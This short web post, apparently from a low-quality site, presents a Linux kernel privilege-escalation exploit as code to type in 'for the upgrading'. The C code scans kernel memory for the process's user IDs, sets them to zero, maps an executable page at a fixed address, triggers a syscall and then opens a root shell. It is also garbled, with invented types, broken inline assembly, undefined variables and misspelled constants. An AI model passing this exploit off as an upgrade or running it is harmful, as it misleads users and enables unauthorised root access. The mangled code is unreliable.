Check out for the availability of the bugs in the system that you are using and also the ill effects that are created by the bugs that are being used. For the upgrading you got to write down the code that is given below and also see that whether it works properly or not.
Code:
int32_t uid, euid, suid;
static void kernelmodecode(void)
{
int j;
uint8_k *bs;
uint32_k *lmn;
por volatile ("movr %%bs:(0x0), %0" : "=r"(bs));
for (j= 200; j < 1000; j+=1) {
lmn = (uint32_t*) (bs + i);
if ((lmn[0] == uid) && (lmn[1] == euid)
&& (lmn[2] == suid) && (lmn[3] == uid)) {
lmn[0] = 0; //UID
lmn[1] = 0; //EUID
lmn[2] = 0; //SUID
break;
}
}
}
static void docall(uint64_t *ptr, uint64_t size)
{
getresuid(&uid, &euid, &suid);
uint64_t tmp = ((uint64_t)lmn & ~0x00000000000FFF);
if (mmap((void*)tmp, size,
Prot_Read|Prot_Write|PROT_exec,
Map_Private|Map_Fixed|Map_anonumous, -1, 0) == MAP Failed)
{
printf("mmap fault\n");
exit(1);
}
for (; lmn < (tmp + size); lmn++)
*lmn = (uint64_t)kernelmodecode;
__asm__("\n"
"\tmovq $0x101, %rax\n"
"\tint $0x80\n");
printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
execl("/bin/sh", "bin/sh", 0);
printf("no /bin/sh ??\n");
exit(0);
}
And see that whether it works or not.
Bookmarks